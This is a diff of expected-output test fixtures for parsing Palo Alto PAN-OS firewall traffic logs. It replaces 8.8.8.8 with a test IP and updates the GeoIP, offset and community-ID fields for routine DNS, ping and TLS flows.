@@ -2161,12 +2111,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24185", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091131, "panw.panos.source.interface": "ethernet1/2", @@ -2181,14 +2131,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.196", - "8.8.8.8" + "192.168.15.196" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 2, "server.port": 0, @@ -2214,14 +2164,7 @@ "client.packets": 19, "client.port": 52355, "destination.address": "172.217.9.142", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 3245, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.9.142", "destination.nat.ip": "172.217.9.142", "destination.nat.port": 80, @@ -2249,7 +2192,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 9271, + "log.offset": 9391, "network.application": "ocsp", "network.bytes": 5790, "network.community_id": [ 
@@ -2323,17 +2266,18 @@ "client.nat.port": 24430, "client.packets": 1, "client.port": 50196, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 179, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -2347,7 +2291,7 @@ "event.end": "2018-11-30T16:08:57.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:57.000-02:00", "event.timezone": "-02:00", @@ -2359,12 +2303,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 9763, + "log.offset": 9883, "network.application": "dns", "network.bytes": 261, "network.community_id": [ - "1:9T+RKr8xDB21pvAf/Fihyq72sLY=", - "1:URR/wC9NPuHbnjGQ1Y7LffVYlTc=" + "1:FlksUdaebhTer2TPcpfwCUq7loY=", + "1:NSA2qdITGuu6//2R09CwIX3i8FE=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -2381,12 +2325,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24173", - "panw.panos.network.nat.community_id": "1:9T+RKr8xDB21pvAf/Fihyq72sLY=", + "panw.panos.network.nat.community_id": "1:NSA2qdITGuu6//2R09CwIX3i8FE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091133, "panw.panos.source.interface": "ethernet1/2", @@ -2401,14 +2345,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -2434,17 +2378,7 @@ "client.packets": 13, "client.port": 52454, "destination.address": "54.84.80.198", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 4537, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.84.80.198", "destination.nat.ip": "54.84.80.198", "destination.nat.port": 443, 
@@ -2472,7 +2406,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 10212, + "log.offset": 10342, "network.application": "traps-management-service", "network.bytes": 6295, "network.community_id": [ @@ -2548,14 +2482,6 @@ "client.port": 52445, "destination.address": "199.167.55.52", "destination.bytes": 0, - "destination.geo.city_name": "Sunnyvale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.386, - "destination.geo.location.lon": -122.0144, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "199.167.55.52", "destination.nat.ip": "199.167.55.52", "destination.nat.port": 4282, @@ -2583,7 +2509,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 10725, + "log.offset": 10855, "network.application": "incomplete", "network.bytes": 624, "network.community_id": [ 
@@ -2657,17 +2583,18 @@ "client.nat.port": 0, "client.packets": 6, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 588, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 6, "destination.port": 0, 
@@ -2681,7 +2608,7 @@ "event.end": "2018-11-30T16:09:19.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:19.000-02:00", "event.timezone": "-02:00", @@ -2693,12 +2620,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 11198, + "log.offset": 11328, "network.application": "ping", "network.bytes": 1176, "network.community_id": [ - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", - "1:iNhLzwoKKarTKCq59Sts/hhZN7Q=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:P75WlJ7hfYMGDrg11tgcwQhxoAI=" ], "network.direction": "outbound", "network.packets": 12, 
@@ -2715,12 +2642,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24242", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091136, "panw.panos.source.interface": "ethernet1/2", @@ -2735,14 +2662,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 6, "server.port": 0, 
@@ -2767,17 +2694,18 @@ "client.nat.port": 33110, "client.packets": 1, "client.port": 35485, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -2790,7 +2718,7 @@ "event.end": "2018-11-30T16:09:02.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:02.000-02:00", "event.timezone": "-02:00", @@ -2800,12 +2728,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 11643, + "log.offset": 11783, "network.application": "dns", "network.bytes": 215, "network.community_id": [ - "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=", - "1:XjmNQR0k4Z9rGS6dXH+3mvmrqzA=" + "1:oGfTGYDsAux8eMBCoBff8uxez9M=", + "1:vRrHCKzYF5Vw0mmasFYnIzPK2V4=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -2822,12 +2750,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24190", - "panw.panos.network.nat.community_id": "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=", + "panw.panos.network.nat.community_id": "1:oGfTGYDsAux8eMBCoBff8uxez9M=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091137, "panw.panos.source.interface": "ethernet1/2", @@ -2841,14 +2769,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.210", - "8.8.8.8" + "192.168.15.210" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -2874,14 +2802,7 @@ "client.packets": 6, "client.port": 62730, "destination.address": "172.217.9.142", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 1991, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.9.142", "destination.nat.ip": "172.217.9.142", "destination.nat.port": 443, @@ -2906,7 +2827,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 12089, + "log.offset": 12239, "network.application": "quic", "network.bytes": 4867, "network.community_id": [ 
@@ -2981,14 +2902,7 @@ "client.packets": 8, "client.port": 52506, "destination.address": "151.101.2.2", - "destination.as.number": 54113, - "destination.as.organization.name": "Fastly", "destination.bytes": 523, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "151.101.2.2", "destination.nat.ip": "151.101.2.2", "destination.nat.port": 443, @@ -3016,7 +2930,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 12559, + "log.offset": 12709, "network.application": "ssl", "network.bytes": 1623, "network.community_id": [ @@ -3091,17 +3005,7 @@ "client.packets": 5, "client.port": 60596, "destination.address": "216.58.194.66", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 2428, - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.3861, - "destination.geo.location.lon": -122.0839, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "216.58.194.66", "destination.nat.ip": "216.58.194.66", "destination.nat.port": 443, @@ -3129,7 +3033,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 13050, + "log.offset": 13200, "network.application": "quic", "network.bytes": 4405, "network.community_id": [ 
@@ -3203,17 +3107,18 @@ "client.nat.port": 0, "client.packets": 6, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 588, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 6, "destination.port": 0, 
@@ -3227,7 +3132,7 @@ "event.end": "2018-11-30T16:09:25.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:25.000-02:00", "event.timezone": "-02:00", @@ -3239,12 +3144,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 13518, + "log.offset": 13668, "network.application": "ping", "network.bytes": 1176, "network.community_id": [ - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", - "1:iNhLzwoKKarTKCq59Sts/hhZN7Q=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:P75WlJ7hfYMGDrg11tgcwQhxoAI=" ], "network.direction": "outbound", "network.packets": 12, 
@@ -3261,12 +3166,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24328", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091141, "panw.panos.source.interface": "ethernet1/2", @@ -3281,14 +3186,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 6, "server.port": 0, 
@@ -3313,17 +3218,18 @@ "client.nat.port": 0, "client.packets": 2, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 196, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 2, "destination.port": 0, 
@@ -3337,7 +3243,7 @@ "event.end": "2018-11-30T16:09:25.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:25.000-02:00", "event.timezone": "-02:00", @@ -3349,12 +3255,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 13962, + "log.offset": 14122, "network.application": "ping", "network.bytes": 392, "network.community_id": [ - "1:7LdGPOlsucPADJQxcTlIy8FSIxU=", - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:OluRae/1XXdteWCnzDY1tWknrF0=" ], "network.direction": "outbound", "network.packets": 4, 
@@ -3371,12 +3277,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24385", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091142, "panw.panos.source.interface": "ethernet1/2", @@ -3391,14 +3297,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.210", - "8.8.8.8" + "192.168.15.210" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 2, "server.port": 0, @@ -3424,14 +3330,7 @@ "client.packets": 12, "client.port": 52514, "destination.address": "184.51.253.193", - "destination.as.number": 16625, - "destination.as.organization.name": "Akamai Technologies, Inc.", "destination.bytes": 5003, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "184.51.253.193", "destination.nat.ip": "184.51.253.193", "destination.nat.port": 443, @@ -3459,7 +3358,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 14404, + "log.offset": 14574, "network.application": "ssl", "network.bytes": 7231, "network.community_id": [ 
@@ -3533,17 +3432,18 @@ "client.nat.port": 51374, "client.packets": 1, "client.port": 55155, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 171, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -3557,7 +3457,7 @@ "event.end": "2018-11-30T16:09:08.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:08.000-02:00", "event.timezone": "-02:00", @@ -3569,12 +3469,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 14890, + "log.offset": 15060, "network.application": "dns", "network.bytes": 267, "network.community_id": [ - "1:BengLCKQRlHSjje1eFQLdxgTKJc=", - "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=" + "1:QvcLIBQ/llZfAEhjuMmKr/RH930=", + "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -3591,12 +3491,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24131", - "panw.panos.network.nat.community_id": "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=", + "panw.panos.network.nat.community_id": "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091144, "panw.panos.source.interface": "ethernet1/2", @@ -3611,14 +3511,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 171, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -3645,14 +3545,6 @@ "client.port": 52445, "destination.address": "199.167.55.52", "destination.bytes": 0, - "destination.geo.city_name": "Sunnyvale", - 